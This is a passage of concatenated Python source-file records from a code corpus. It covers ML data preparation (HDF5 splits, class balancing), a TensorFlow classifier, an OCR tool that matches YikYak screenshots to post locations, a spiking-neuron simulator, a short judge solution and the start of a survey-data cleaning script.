http://scikit-learn.org/stable/ to be installed on the system.\n\"\"\"\n\ndef read_csv(ifile):\n\t\"\"\"Reads csv into numpy arrays:\n\tcsv has to be in format: CID,SMILE,Activity label,features\"\"\"\n\tprint(\"Now working on file {}\".format(ifile))\n\treader = csv.reader(open(ifile, \"rt\"), delimiter=',')\n\theaders = next(reader)\n\treader = pd.read_csv(ifile)\n\tlabels = reader['Activity']\n\tfeatures = reader.iloc[:, 3:]\n\tlabels = np.array(labels, dtype=float)\n\tfeatures = np.array(features, dtype=float)\n\tprint(\"Number of instances: \", len(labels))\n\tprint(\"Number of features\", len(features[0]))\n\tprint()\n\tprint(\"Done reading csv file\")\n\tprint()\n\treturn labels, features\n\n\ndef TrainTest_Validation(labels,features):\n\t\"Splits train-test and validation dataset: 80% is used for training-testing (5Fold Cross Validation) and 20% is kept outside for model validation\"\n\tprint(\"Now splitting to test and validation sets\")\n\ttrain_labels, test_labels, train_features, test_features = model_selection.train_test_split(labels, features, test_size=0.20, random_state=0)\n\tprint(len(train_labels))\n\tprint(len(test_labels))\n\tprint(\"Done\")\n
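\t# hold out 20% once up front; the remaining 80% train split feeds the 5-fold splitter below\n\treturn train_labels, test_labels, train_features, 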
test_features\n\n\ndef Kfold(train_labels, train_features):\n\t\"Splits training dataset in 5 fold cross validation pair sets train1/test1, train2/test2 etc\"\n\tsss = KFold(n_splits=5, shuffle=True, random_state=0)\n\tprint(len(train_labels))\n\treturn sss\n\n\ndef write_TrainSet(fileName, train_labels, train_features):\n\t\"\"\"\n\tWrites the complete training dataset to file\n\t\"\"\"\n\tprint(len(train_labels))\n\tos.chdir(\"E:/My Coding/Scripts/Path to/Train set/lipinski_train_test/\")\n\tHDF5file = fileName+\".h5\"\n\tCSVfile = fileName+\".csv\"\n\tprint(\"Now writing train set\")\n\tprint(HDF5file)\n\tprint(CSVfile)\n\twriterTrain = csv.writer(open(CSVfile, \"wt\", newline=''), delimiter=',')\n\twith h5py.File(HDF5file, 'w') as f:\n\t\tf['HDF5Data2'] = train_labels.astype(np.float32)\n\t\tf['HDF5Data1'] = train_features.astype(np.float32)\n\n\tfor j in range(len(train_labels)):\n\t\ttemp=[]\n\t\ttemp.append(int(train_labels[j]))\n\t\tfor x in range(len(train_features[j])):\n\t\t\ttemp.append(float(train_features[j][x]))\n\n\t\twriterTrain.writerow(temp)\n\treturn\n\n\n\ndef write_Validation(fileName, test_labels, test_features):\n\t\"\"\"\n\tWrites the validation set to file\n\t\"\"\"\n\tprint(len(test_labels))\n\tos.chdir(\"E:/My Coding/Scripts/Path to/Validation/lipinski/\")\n\tHDF5file = fileName+\".h5\"\n\tCSVfile = fileName+\".csv\"\n\tprint(\"Now writing test set\")\n\tprint(HDF5file)\n\tprint(CSVfile)\n\twriterValidation = csv.writer(open(CSVfile, \"wt\", newline=''), delimiter=',')\n\twith h5py.File(HDF5file, 'w') as f:\n\t\tf['HDF5Data1'] = test_features.astype(np.float32)\n\t\tf['HDF5Data2'] = test_labels.astype(np.float32)\n\n\tfor j in range(len(test_labels)):\n\t\ttemp = []\n\t\ttemp.append(int(test_labels[j]))\n\t\tfor x in range(len(test_features[j])):\n\t\t\ttemp.append(float(test_features[j][x]))\n\n\t\twriterValidation.writerow(temp)\n\treturn\n\n\ndef write_files(sss, labels, features):\n\tos.chdir(\"E:/My Coding/Scripts/Path to/Train_Test/lipinski/\")\n\tcount = 0\n\tfor train_index, test_index in sss.split(train_labels):\n\t\tprint()\n\t\tcount += 1\n\t\tprint(\"Fold: \", count)\n\t\t#==================\n\t\t#Writes outputfiles to csv files\n\t\tTrain = \"train_\"+str(count)\n\t\tCsvTrain = Train+\".csv\"\n\t\tH5Train = Train+\".h5\"\n\t\tTest = \"test_\"+str(count)\n\t\tCsvTest = Test+\".csv\"\n\t\tH5Test = Test+\".h5\"\n\t\ty_train = labels[train_index] #train labels\n\t\ty_test = labels[test_index] #test labels\n\t\tx_train = features[train_index] #train features\n\t\tx_test = features[test_index] #test features\n\t\twriterTrain = csv.writer(open(CsvTrain, \"wt\", newline=''), delimiter=',')\n\t\twriterTest = csv.writer(open(CsvTest, \"wt\", newline=''), delimiter=',')\n\t\tprint(\"Number of training instances \", len(x_train))\n\t\tprint(\"Number of test instances \", len(x_test))\n\t\tprint()\n\t\tprint(\"Now writing to \", CsvTrain, H5Train)\n\t\twith h5py.File(H5Train, 'w') as f:\n\t\t\tf['HDF5Data1'] = x_train.astype(np.float32)\n\t\t\tf['HDF5Data2'] = y_train.astype(np.float32)\n\t\twith h5py.File(H5Test, 'w') as f:\n\t\t\tf['HDF5Data1'] = x_test.astype(np.float32)\n\t\t\tf['HDF5Data2'] = y_test.astype(np.float32)\n\t\tfor j in range(len(y_train)):\n\n\t\t\ttemp = []\n\t\t\ttemp.append(int(y_train[j]))\n\t\t\tfor x in range(len(x_train[j])):\n\t\t\t\ttemp.append(float(x_train[j][x]))\n\n\t\t\twriterTrain.writerow(temp)\n\n\t\tprint()\n\t\tprint(\"Now writing to \", CsvTest)\n\n\t\tfor j in range(len(y_test)):\n\t\t\ttemp = 
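For reference, the 5-fold pattern used by `Kfold()` and `write_files()` above boils down to the runnable sketch below; the arrays are synthetic stand-ins for the CSV-loaded labels and features, and it indexes the same arrays it splits (the script above relies on module-level names for that):

```python
import numpy as np
from sklearn.model_selection import KFold

# Synthetic stand-ins for the labels/features loaded from CSV above.
labels = np.arange(10, dtype=float)
features = np.random.rand(10, 3)

kf = KFold(n_splits=5, shuffle=True, random_state=0)
for fold, (train_idx, test_idx) in enumerate(kf.split(labels), start=1):
    # Index both arrays with the same index sets, as write_files() does.
    y_train, y_test = labels[train_idx], labels[test_idx]
    x_train, x_test = features[train_idx], features[test_idx]
    print(f"Fold {fold}: {len(y_train)} train / {len(y_test)} test")
```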
[]\n\t\t\ttemp.append(int(y_test[j]))\n\t\t\tfor x in range(len(x_test[j])):\n\t\t\t\ttemp.append(float(x_test[j][x]))\n\n\t\t\twriterTest.writerow(temp)\n\n\n\t\t#======================\n\t\t#Writes outputfiles to hd5 files\n\t\tTrain=\"train_\"+str(count)\n\t\tCsvTrain=Train+\".csv\"\n\t\tTest=\"test_\"+str(count)\n\t\tCsvTest=Test+\".csv\"\n\treturn\n\n\n\nif __name__ == '__main__':\n\tlabels, features = read_csv(\"E:/My Coding/Scripts/Path to/Train set/lipinski_ecfp/lipinski_ecfp6_1024.csv\")\n\ttrain_labels, test_labels, train_features, test_features = TrainTest_Validation(labels, features)\n\twrite_Validation(\"validation\", test_labels, test_features)\n\twrite_TrainSet(\"train_test\", train_labels, train_features)\n\tsss = Kfold(train_labels, train_features)\n\twrite_files(sss, train_labels, train_features)\n","sub_path":"PrepareDataToHDF5.py","file_name":"PrepareDataToHDF5.py","file_ext":"py","file_size_in_byte":5472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"347812079","text":"import pandas as pd\nimport sys\nimport csv\nfrom sklearn.utils import shuffle\npd.set_option('display.max_columns', None)\npd.set_option('display.max_rows', None)\n\ndata = pd.read_csv('clus_training_tj.csv')\n\ndf = pd.DataFrame(data)\n\n\n########################################\n## y=abs(3.2-4.9) data set -- 50% b/s ##\n########################################\n\ndf1 = df[df['y'].abs() >= 3.2]\n\nsort1 = df1.sort_values('background/signal')\ncount = sort1['background/signal'].value_counts().tolist()\na = count[0] - count[1]\n\nsort2 = sort1[a:]\nsort2 = shuffle(sort2)\n\ndfa = sort2.drop(['y'], axis=1)\n\ndfa.to_csv('/Users/Anne-Katherine/Desktop/ATLAS_ML/clus_tj_training_4.9_3.2.csv', encoding='utf-8', index=False)\n\ndf2 = df[df['y'].abs() <= 3.2]\n\n########################################\n## y=abs(2.5-3.2) data set -- 50% b/s ##\n########################################\n\ndf3 = df2[df2['y'].abs() >= 2.5]\n\nsort3 = df3.sort_values('background/signal')\ncount1 = sort3['background/signal'].value_counts().tolist()\nb = count1[0] - count1[1]\n\nsort4 = sort3[b:]\nsort4 = shuffle(sort4)\n\ndfb = sort4.drop(['y'], axis=1)\n\ndfb.to_csv('/Users/Anne-Katherine/Desktop/ATLAS_ML/clus_tj_training_3.2_2.5.csv', encoding='utf-8', index=False)\n\ndf4 = df2[df2['y'].abs() <= 2.5]\n\n########################################\n## y=abs(1.5-2.5) data set -- 50% b/s ##\n########################################\n\ndf5 = df4[df4['y'].abs() >= 1.5]\n\nsort5 = df5.sort_values('background/signal')\ncount2 = sort5['background/signal'].value_counts().tolist()\nc = count2[0] - count2[1]\n\nsort6 = sort5[c:]\nsort6 = shuffle(sort6)\n\ndfc = sort6.drop(['y'], axis=1)\n\ndfc.to_csv('/Users/Anne-Katherine/Desktop/ATLAS_ML/clus_tj_training_2.5_1.5.csv', encoding='utf-8', index=False)\n\n\n######################################\n## y=abs(0-1.5) data set -- 50% b/s ##\n######################################\n\ndf6 = df4[df4['y'].abs() <= 1.5]\n\nsort7 = df5.sort_values('background/signal')\ncount3 = sort7['background/signal'].value_counts().tolist()\nd = count3[0] - count3[1]\n\nsort8 = sort7[d:]\nsort8 = shuffle(sort8)\n\ndfd = sort8.drop(['y'], axis=1)\n\ndfd.to_csv('/Users/Anne-Katherine/Desktop/ATLAS_ML/clus_tj_training_0_1.5.csv', encoding='utf-8', 
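The repeated block in the script above implements a simple down-sampling balance: sort by the class column, count both classes, and drop the surplus of whichever class sorts first. A toy reproduction (data invented, and it assumes the majority label is the one that sorts first, as in the original):

```python
import pandas as pd
from sklearn.utils import shuffle

# Toy frame: 5 "background" rows (0) vs 2 "signal" rows (1).
df = pd.DataFrame({'background/signal': [0, 0, 0, 0, 0, 1, 1],
                   'x': range(7)})

sorted_df = df.sort_values('background/signal')       # majority (0) rows first
counts = sorted_df['background/signal'].value_counts().tolist()
excess = counts[0] - counts[1]                         # majority minus minority
balanced = shuffle(sorted_df[excess:], random_state=0) # drop the surplus rows
print(balanced['background/signal'].value_counts())   # 2 of each class
```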
index=False)\n\n\n","sub_path":"config_towtj_training.py","file_name":"config_towtj_training.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"90619839","text":"import tensorflow as tf\nimport numpy as np\n\nx_data_array = []\n\nfp = open(\"./train_datas/features.csv\", 'r')\ntmp_x = fp.readlines()\nfp.close()\n\nfor i in tmp_x:\n features_data = i.split(',')\n features_array = []\n \n for k in range(6):\n features_array.append(float(features_data[k]))\n\n x_data_array.append(features_array)\n\ndel(tmp_x)\n\ny_data_array = []\n\nfp = open(\"./train_datas/labels.csv\")\ntmp_y = fp.readlines()\nfp.close()\n\nfor i in tmp_y:\n labels_data = i.split(',')\n labels_array = []\n \n for k in range(7):\n labels_array.append(float(labels_data[k]))\n \n y_data_array.append(labels_array)\n\ndel(tmp_y)\n\nx_data = np.array(x_data_array)\ny_data = np.array(y_data_array)\n\nX = tf.placeholder(tf.float32)\nY = tf.placeholder(tf.float32)\n\nW1 = tf.Variable(tf.random_uniform([6, 30], -1.0, 1.0))\nb1 = tf.Variable(tf.zeros(30))\n\nW2 = tf.Variable(tf.random_uniform([30, 60], -1.0, 1.0))\nb2 = tf.Variable(tf.zeros(60))\n\nW3 = tf.Variable(tf.random_uniform([60, 50], -1.0, 1.0))\nb3 = tf.Variable(tf.zeros(50))\n\nW4 = tf.Variable(tf.random_uniform([50, 7], -1.0, 1.0))\nb4 = tf.Variable(tf.zeros(7))\n\nL1 = tf.add(tf.matmul(X, W1), b1)\nL1 = tf.nn.relu(L1)\n\nL2 = tf.add(tf.matmul(L1, W2), b2)\nL2 = tf.nn.relu(L2)\n\nL3 = tf.add(tf.matmul(L2, W3), b3)\nL3 = tf.nn.relu(L3)\n\nmodel = tf.add(tf.matmul(L3, W4), b4)\n\ncost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(labels=Y, logits=model))\noptimizer = tf.train.AdamOptimizer(0.001)\ntrain_op = optimizer.minimize(cost)\n\nsess = tf.Session()\nsess.run(tf.global_variables_initializer())\n\nfor step in range(30000):\n sess.run(train_op, feed_dict={X:x_data, Y:y_data})\n\n if((step + 1) % 100 == 0):\n print(step+1, sess.run(cost, feed_dict={X:x_data, Y:y_data}))\n\nprediction = tf.argmax(model, axis=1)\ntarget = tf.argmax(Y, axis=1)\n\nprint(sess.run(prediction, feed_dict={X: x_data}))\nprint(sess.run(target, feed_dict={Y: y_data}))\n\nis_correct = tf.equal(prediction, target)\naccuracy = tf.reduce_mean(tf.cast(is_correct, tf.float32))\nprint('정확도: %.2f' % sess.run(accuracy * 100, feed_dict={X:x_data, Y:y_data}))","sub_path":"NeuralNet_real.py","file_name":"NeuralNet_real.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"281045229","text":"from PIL import Image\nimport numpy as np\nimport cv2\nimport os.path\nimport time\nfrom pytesser import *\nfrom difflib import SequenceMatcher\nimport copy\n\n'''YakFinder takes a directory of images, stored as the variable \"directory\" and \na list of posted yaks (stored in a text file as [Yak ID],[Yak text],[latitude],[longitude])\nand outputs a text file containing the latitude and longitude, and the ID's of the yaks that \nappear at that location. \n\nWHAT YOU NEED TO DO TO MAKE IT RUN:\nThe directory variable is the path to the folder containing the screenshots you want to test.\n\nThe YakFile variable should be a text document that contains the ID's, text, and locations of the \nposted yaks, as explained above. 
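To make the yak-file format described above concrete, here is an illustrative parse of lines shaped as `[Yak ID],[Yak text],[latitude],[longitude]` into the text-to-ID dictionary that `main()` builds; the sample lines are invented:

```python
# Illustrative parse of the yak file format described above (sample data invented).
sample_lines = [
    "101,Free pizza in the quad,48.73,-122.49",
    "102,Anyone else stuck in line at the bookstore?,48.74,-122.48",
]

yak_dict = {}
for line in sample_lines:
    fields = line.split(',')
    yak_dict[fields[1]] = fields[0]   # map yak text -> yak ID, as main() does

print(yak_dict["Free pizza in the quad"])  # 101
```

Note that a naive `split(',')` breaks on yak texts containing commas; the real loader above has the same limitation.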
\n\nThe barImg variable is used for splitting the image into individual yaks, and it should work as \nlong as you always use the picture currently in the dropbox.\n\nIn the write_dict function you need to change the outfile directory to wherever you would like to \nsave the text file.\n\nADDITIONAL FUNCTIONALITY:\nEvery twenty images, (this can be changed in line 66), the program will update you on how long it \nhas been running, and give an estimate of the time left (based on the total number of photos, which\ncan be changed in line 45 by changing the totalPics variable).\n'''\nglobal failed, SIMILARITY\n\ndef main():\n global failed, SIMILARITY\n SIMILARITY = .8\n failed = []\n\n locDict = {}\n yakDict = {}\n\n yakFile = open(\"C:/Users/sumproj/Dropbox/YikYak/Yaks/yaks6.txt\",\"r\")\n for line in yakFile:\n yakDict[line.split(',')[1]] = line.split(',')[0]\n yakFile.close()\n\n directory = \"C:/Users/sumproj/Desktop/Screenshots1\"\n barImg = cv2.imread(('C:/Users/sumproj/Desktop/OCR Stuff/grayBar.png'),0)\n\n totalPics = 2994\n picNum = 0\n startTime = time.time()\n\n count = 0\n for filename in os.listdir(directory):\n picNum += 1\n count += 1\n #Can use the below lines to cut off the function after a certain number of images\n #if count == 10:\n # break\n\n if filename == \"Thumbs.db\":\n continue\n currentImage = cv2.imread((directory + \"/\" + filename), 0)\n coordinate = get_location(filename)\n yaksSeen = get_yaks(yakDict, currentImage, barImg)\n if yaksSeen == -1:\n failed.append(filename)\n continue\n if not (coordinate in locDict.keys()):\n locDict[coordinate] = yaksSeen\n else:\n for yak in yaksSeen:\n if yak not in locDict[coordinate]:\n locDict[coordinate].append(yak)\n locDict[coordinate].sort()\n\n if picNum % 20 == 0:\n timeLeft = (time.time()-startTime)/(60.0*picNum)*(totalPics-picNum)\n print(str(picNum) + \"/\" + str(totalPics) + \" \" + \"apprx. \" + str(timeLeft) + \" min left\")\n \n print('The following files failed:', failed)\n print('time elapsed ' + str((time.time()-startTime)))\n print('\\nReady to write')\n write_dict(locDict)\n write_failed(failed)\n print('\\nDone')\n\ndef write_dict(locDict):\n '''Writes the contents of the LocDict Object to a text file. This dictionary maps\n a location to what yaks can be seen at that location'''\n\n outFile = open(\"C:/Users/sumproj/Desktop/OCR Stuff/coordinate_map1.txt\", 'w')\n for key in locDict.keys():\n ids = locDict[key]\n outFile.write(key)\n for i in ids:\n outFile.write(\",\"+i)\n outFile.write('\\n')\n outFile.close()\n\ndef write_failed(failed):\n '''Writes the contents of the failed list to a text file so that you can look at\n the images manually. There is a helper file called FailedChecker that you can use\n to view the images.'''\n\n outfile = open(\"C:/Users/sumproj/Desktop/OCR Stuff/failed1.txt\", 'w')\n for filename in failed:\n outfile.write(filename)\n outfile.write('\\n')\n outfile.close()\n\ndef get_location(inStr):\n '''Gets location from file name'''\n\n splitLine = inStr.split(\"_\")\n return splitLine[0]+\",\"+splitLine[1]\n\ndef get_yaks(yakDict, img, barImg):\n '''Finds what yaks appear in an image. 
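The bar detection relies on OpenCV template matching: the numeric method code `5` used above is `cv2.TM_CCOEFF_NORMED`, and rows whose match score survives a 0.7 threshold mark separator bars. A self-contained toy reproduction with synthetic arrays standing in for the screenshot and `grayBar.png`:

```python
import cv2
import numpy as np

# Synthetic "screenshot": noisy canvas with two copies of a dark bar pattern.
rng = np.random.default_rng(0)
img = rng.integers(100, 200, size=(200, 80)).astype(np.uint8)
bar = rng.integers(0, 50, size=(4, 80)).astype(np.uint8)  # stand-in for grayBar.png
img[60:64, :] = bar
img[140:144, :] = bar

# Method code 5 == cv2.TM_CCOEFF_NORMED, the constant used numerically above.
scores = cv2.matchTemplate(img, bar, cv2.TM_CCOEFF_NORMED)
_, mask = cv2.threshold(scores, 0.7, 1, cv2.THRESH_BINARY)

# Rows whose first column passes the threshold mark bar positions,
# mirroring get_y_values().
bar_rows = [y for y in range(mask.shape[0]) if mask[y][0] == 1]
print(bar_rows)  # [60, 140]
```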
The image is first split into each individual yak (cropYaks)\n and then OCR is performed.'''\n try:\n matchedImg = cv2.matchTemplate(img, barImg, 5)\n discard, matchedImg = cv2.threshold(matchedImg, .7, 1, cv2.THRESH_BINARY)\n barLocs = get_y_values(matchedImg)\n return cropYaks(img, barLocs, yakDict, SIMILARITY)\n except cv2.error:\n print('Open CV error')\n return -1\n\ndef get_y_values(img):\n '''This function is used in splitting the yak image.'''\n toReturn = []\n for i in range(len(img)):\n if img[i][0] == 1:\n toReturn.append(i)\n\n return toReturn\n\ndef cropYaks(arr, locList, yakDik, ratio):\n '''Splits the image into individual yaks, and performs OCR on the individual yak images.'''\n\n try:\n imgYaks = []\n prev = 0\n cutUp, cutDown = 19, 5\n saveArr = arr\n arr = arr[:-cutUp, :]\n for loc in locList:\n if prev + cutDown > loc - cutUp:\n prev = loc\n continue\n newArr = arr[prev+cutDown: loc-cutUp,:]\n #cv2.imshow('test',newArr)\n #cv2.waitKey(0)\n #cv2.destroyAllWindows()\n new_img = Image.fromarray(newArr.astype('uint8'),'L')\n y = image_to_string(new_img).strip()\n if y:\n imgYaks.append(y)\n prev = loc\n\n ids = []\n for yak in yakDik.keys():\n inside = False\n for newYak in imgYaks:\n if similar(yak, newYak) >= ratio:\n inside = True\n if inside: ids.append(yakDik[yak]) \n\n return ids\n except IOError:\n '''Sometimes tesseract runs into a permission error when saving files, this except clause\n prevents it for ruining the program.'''\n #print(\"exceptin\")\n return cropYaks(saveArr, locList, yakDik, ratio)\n except SystemError:\n '''Sometimes tesseract runs into a weird error reading images, this except clause\n prevents it for ruining the program.'''\n #print(\"exceptin\")\n print(\"Tile Error\")\n return -1\n\n \ndef similar(a, b):\n return SequenceMatcher(None, a, b).ratio()\n\nmain()","sub_path":"OCR stuff/YakFinder2.py","file_name":"YakFinder2.py","file_ext":"py","file_size_in_byte":5858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"350516343","text":"import numpy as np\nimport matplotlib\n\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\n\nclass System:\n def __init__(self, no_of_neurons):\n self.n = [self.Neuron(i) for i in range(no_of_neurons)]\n\n def connect(self, i, j):\n self.n[i].gc.append(j)\n self.n[j].gc.append(i)\n\n class Neuron:\n def __init__(self, i):\n self.ID = i\n # state\n self.v = -65.\n self.u = -65. * 0.2\n self.i_gc = 0\n # gap junctions\n self.gc = []\n self.gsyn = 0.0\n # external input\n self.I = 0.\n\n def collect_gc_input(self, n_vec):\n i_gc = 0\n for i in self.gc:\n i_gc += self.gsyn * (n_vec[i].V - self.v)\n return i_gc\n\n\nclass Integrate:\n def __init__(self, dt):\n self.dt = dt\n\n def forward_euler(self, _sys):\n self.system = _sys\n rhs = self._rhs()\n for i, (n, n_rhs) in enumerate(zip(self.system.n, rhs.n)):\n if self.system.n[i].v >= 30.:\n self.system.n[i].v = -65.\n self.system.n[i].u += 8.\n\n self.system.n[i].v += self.dt * n_rhs.v\n self.system.n[i].u += self.dt * n_rhs.v\n self.system.n[i].i_gc = n_rhs.i_gc\n\n def _rhs(self):\n rhs = System(len(self.system.n))\n for ii, (n_new, n_old) in enumerate(zip(rhs.n, self.system.n)):\n rhs.n[ii].v = 0.04*n_old.v*n_old.v + 5.*n_old.v + 140. 
- n_old.u + n_old.I # + n_old.I_gc\n rhs.n[ii].u = 0.002 * (0.2 * n_old.v - n_old.u)\n rhs.n[ii].i_gc = n_old.collect_gc_input(sys)\n return rhs\n\nN = 6000\ndt = 0.1\n\nInt = Integrate(dt)\n\nsys = System(3)\nvu = np.zeros(shape=(4, N))\n\nfor i in range(N):\n if i == 1000:\n sys.n[1].I = 5.\n if i == 2000:\n sys.n[1].I = 0.\n if i == 3000:\n sys.n[1].I = 5.\n if i == 4000:\n sys.n[1].I = 0.\n Int.forward_euler(sys)\n vu[0][i] = sys.n[1].v\n vu[1][i] = sys.n[1].u\n vu[2][i] = sys.n[1].i_gc\n vu[3][i] = sys.n[1].I\n\nplt.plot(np.arange(0, N * dt, dt), vu[0])\nplt.plot(np.arange(0, N * dt, dt), vu[1])\nplt.plot(np.arange(0, N * dt, dt), vu[3])\nplt.show()\n","sub_path":"prelim/simple_chain/py_source/regular_spiking_2.py","file_name":"regular_spiking_2.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"490511776","text":"# http://judge.u-aizu.ac.jp/onlinejudge/description.jsp?id=ITP2_4_A&lang=jp\n# Reverse\n\nfrom collections import deque\nimport sys\ninput = sys.stdin.readline\n\ndef main():\n n1 = int(input())\n l1 = list(map(int,input().split()))\n for i in range(int(input())):\n (a,b) = map(int,input().split())\n for ni in range((b-a)//2):\n l1[a+ni],l1[b-1-ni] = l1[b-1-ni],l1[a+ni]\n print (\" \".join(map(str,l1)))\n\n\nif __name__ == '__main__':\n main()","sub_path":"ITP2/ITP2_4_A.py","file_name":"ITP2_4_A.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"628305019","text":"import pandas as pd\nimport numpy as np\nimport sqlscripts\nimport pypyodbc\n\n'''This script is a way to get and process SQL Queries so that they are immediately amenable to analytics in a variety of ways. To that end, I've made most variables on the suvey into categorical variables\nreplaced unanswered portions with 0s (methodologically debatable, but often necessary), and combined different layerings of historical data, at least in the output. 
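For comparison with the neuron class above, here is a standalone forward-Euler integration of a regular-spiking Izhikevich neuron using the standard textbook parameters (a=0.02, b=0.2, c=-65, d=8); note the class above hard-codes a=0.002 and steps `u` with the `v` derivative, which looks like a slip:

```python
import numpy as np

# Standalone regular-spiking Izhikevich neuron, forward Euler, dt = 0.1 ms.
a, b, c, d = 0.02, 0.2, -65.0, 8.0
dt, steps = 0.1, 6000

v, u = c, b * c
vs = np.empty(steps)
for t in range(steps):
    # Same stimulus schedule as the driver loop above: I = 5 in two windows.
    I = 5.0 if 1000 <= t < 2000 or 3000 <= t < 4000 else 0.0
    if v >= 30.0:          # spike: reset membrane potential, bump recovery
        v, u = c, u + d
    dv = 0.04 * v * v + 5.0 * v + 140.0 - u + I
    du = a * (b * v - u)
    v += dt * dv
    u += dt * du
    vs[t] = v

print(f"spikes: {(vs >= 30.0).sum()}")  # tonic firing during the stimulus windows
```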
Better layering could be done on the SQL side to avoid\nsuch methodological problems, but this seems defendable in the immediate context (and is easy enough to change).'''\n\n\ndef connecttodb(sqlquery1, sqlquery2):\n cnxn = pypyodbc.connect(driver='{SQL Server}', server = 'HQOLYMSQL09P', database = 'CTRSurvey')\n df1 = pd.read_sql_query(sqlquery1, cnxn)\n df1 = df1.pivot(index = 'surveyresponseid', columns = 'question', values = 'domainvaluetext')\n df2 = pd.read_sql_query(sqlquery2, cnxn)\n df2 = df2.set_index('surveyresponseid')\n df = pd.concat([df1, df2], axis=1)\n return df\n\ndef changecolumnnames(df, columndictionary):\n df = df.rename(columns=columndictionary)\n df = df.drop('irrelevant', axis = 1)\n return df\n\ndef concatenateddf(df, columnname):\n newdf = pd.get_dummies(df[columnname])\n df = pd.concat([newdf, df], axis = 1)\n df = df.drop(columnname, axis = 1)\n return df\n\ndef change_labels(df, columnname):\n labels = columnname.split('_')\n suffix = labels[1]\n df[columnname] = df[columnname].replace('No Answer/Blank', '0')\n df[columnname] = df[columnname].replace(np.nan, '0')\n df[columnname] = df[columnname].replace('Did Not Work(day off, sick, etc.)', 'TransType_' + suffix + '_dayoff')\n df[columnname] = df[columnname].str.replace('Drove Alone', 'TransType_' + suffix + '_sov')\n df[columnname] = df[columnname].str.replace('Teleworked', 'TransType_' + suffix + '_telework')\n df[columnname] = df[columnname].str.replace('Took The bus', 'TransType_' + suffix + '_bus')\n df[columnname] = df[columnname].str.replace('Carpooled', 'TransType_' + suffix + '_carpool')\n df[columnname] = df[columnname].str.replace('Walked', 'TransType_' + suffix + '_walked')\n df[columnname] = df[columnname].str.replace('Rode The Train/light rail/streetcar', 'TransType_' + suffix + '_rail')\n df[columnname] = df[columnname].str.replace('Rode A Bicycle', 'TransType_' + suffix + '_bike')\n df[columnname] = df[columnname].str.replace('Compressed WorkWeek Day Off', 'TransType_' + suffix + '_compressww')\n df[columnname] = df[columnname].str.replace('Other', 'TransType_' + suffix + '_other')\n df[columnname] = df[columnname].str.replace('Motorcycle/Moped', 'TransType_' + suffix + '_2wheeledvehicle')\n df[columnname] = df[columnname].str.replace('Overnight Business Trip', 'TransType_' + suffix + '_businesstrip')\n df[columnname] = df[columnname].str.replace('Vanpooled', 'TransType_' + suffix + '_vanpool')\n df[columnname] = df[columnname].str.replace('Boarded ferry with car/van/bus', 'TransType_' + suffix + '_driveonferry')\n df[columnname] = df[columnname].str.replace('Used ferry as walk-on passenger', 'TransType_' + suffix + '_walkonferry')\n df[columnname] = df[columnname].fillna(0)\n dummydf = pd.get_dummies(df[columnname])\n dummydf = dummydf.drop('0', axis = 1)\n df = pd.concat([dummydf, df], axis = 1)\n df = df.drop(columnname, axis = 1)\n return df\n\ndef likelytotry(df, columnname):\n labels = columnname.split('try')\n suffix = labels[1]\n df[columnname] = df[columnname].str.replace(\"Not An Option\", 'AttitudeToCTR' + \"NotAnOption\" + suffix)\n df[columnname] = df[columnname].str.replace(\"Not Likely\", 'AttitudeToCTR' + \"LowLikelihood\" + suffix)\n df[columnname] = df[columnname].str.replace(\"Likely\", 'AttitudeToCTR' + \"Likely\" + suffix)\n df[columnname] = df[columnname].str.replace(\"Do Now\", 'AttitudeToCTR' + \"DoNow\" + suffix)\n df[columnname] = df[columnname].replace(\"No Answer/Blank\", np.nan)\n df[columnname] = df[columnname].fillna(0)\n dummydf = 
pd.get_dummies(df[columnname])\n df = pd.concat([dummydf, df], axis = 1)\n df = df.drop(columnname, axis = 1)\n df = df.drop(0, axis = 1)\n return df\n\ndef fixtranstype(df):\n df = change_labels(df, 'TransType_Mon')\n df = change_labels(df, 'TransType_Tue')\n df = change_labels(df, 'TransType_Wed')\n df = change_labels(df, 'TransType_Thu')\n df = change_labels(df, 'TransType_Fri')\n df = change_labels(df, 'TransType_Sat')\n df = change_labels(df, 'TransType_Sun')\n return df\n\ndef fixattitudinaldata(df):\n if 'likelytotryCompressed' or 'likelytotrycarpool' in df:\n df = likelytotry(df, 'likelytotryCompressed')\n df = likelytotry(df, 'likelytotrycarpool')\n df = likelytotry(df, 'likelytotryVAN')\n df = likelytotry(df, 'likelytotrybus')\n df = likelytotry(df, 'likelytotryTrain')\n df = likelytotry(df, 'likelytotryBicycle')\n df = likelytotry(df, 'likelytotryWalking')\n df = likelytotry(df, 'likelytotryTeleWork')\n return df\n\ndef categoricaltransitdata(df):\n rail = df.columns[df.columns.str.contains('TransType' and 'rail')]\n bus = df.columns[df.columns.str.contains('TransType' and '_bus')]\n transit = rail.tolist() + bus.tolist()\n df['transitscore'] = df[transit].sum(axis=1)\n df['UsesTransit'] = np.where(df['transitscore'] > 0, 1, 0)\n df['RegularTransitRider'] = np.where(df['transitscore'] > 3, 1, 0)\n df = df.drop('transitscore', axis=1)\n return df\n\ndef cleaning_function(df):\n # cleans up commuter participation variable\n if 'BeginWorkBetween6and9am' in df:\n df['BeginWorkBetween6and9am'] = df['BeginWorkBetween6and9am'].str.replace('Yes', 'Beginbtw6and9am')\n df['BeginWorkBetween6and9am'] = df['BeginWorkBetween6and9am'].str.replace('No', 'DidNotBeginbtw6and9am')\n df['BeginWorkBetween6and9am'] = df['BeginWorkBetween6and9am'].fillna(0)\n df = concatenateddf(df, 'BeginWorkBetween6and9am')\n\n # cleans up paying for parking variable\n if 'PayforParking' in df:\n df.PayforParking = df.PayforParking.replace('Yes', 'PaidforParking')\n df.PayforParking = df.PayforParking.replace('No', 'DidNotPayforParking')\n df.PayforParking = df.PayforParking.fillna(0)\n df = concatenateddf(df, 'PayforParking')\n\n # cleans up and featurizes 